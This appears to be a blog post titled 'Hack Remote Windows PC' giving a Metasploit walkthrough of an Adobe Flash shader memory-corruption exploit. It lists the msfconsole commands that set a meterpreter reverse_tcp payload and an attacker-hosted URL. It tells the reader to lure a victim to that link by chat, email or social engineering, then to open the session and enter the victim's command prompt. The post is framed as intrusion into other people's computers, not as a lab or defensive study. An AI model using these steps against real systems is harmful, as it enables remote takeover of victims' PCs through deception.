Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption

This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/windows/browser/adobe_flash_shader_drawing_fill
msf exploit (adobe_flash_shader_drawing_fill)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_shader_drawing_fill)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (adobe_flash_shader_drawing_fill)>set srvhost 192.168.0.125
msf exploit (adobe_flash_shader_drawing_fill)>set uripath /
msf exploit (adobe_flash_shader_drawing_fill)>exploit


Now an URL you should give to your victim http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

0 comments:

Post a Comment